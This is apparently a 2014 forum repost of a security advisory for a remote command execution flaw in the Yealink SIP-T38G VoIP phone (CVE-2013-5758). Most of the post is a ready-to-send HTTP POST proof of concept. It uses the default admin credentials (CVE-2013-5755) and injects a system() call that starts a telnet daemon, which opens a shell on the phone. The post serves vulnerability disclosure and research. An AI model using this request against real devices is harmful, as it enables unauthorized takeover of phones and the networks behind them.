Active Members Fi8sVrs Posted June 14, 2014 Active Members Report Posted June 14, 2014 Yealink VoIP phone version SIP-T38G suffers from a remote command execution vulnerability.Title: Yealink VoIP Phone SIP-T38G Remote Command ExecutionAuthor: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 TeamVendor Homepage: http://www.yealink.com/Companyprofile.aspxVersion: VoIP Phone SIP-T38GCVE: CVE-2013-5758Description:Using cgiServer.exx we are able to send OS command using the systemfunction.POC:POST /cgi-bin/cgiServer.exx HTTP/1.1Host: 10.0.75.122Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateAuthorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 0system("/bin/busybox%20telnetd%20start")-- *Mr.Un1k0d3r** or 1 #*Yealink VoIP Phone SIP-T38G Remote Command Execution ? Packet Storm Quote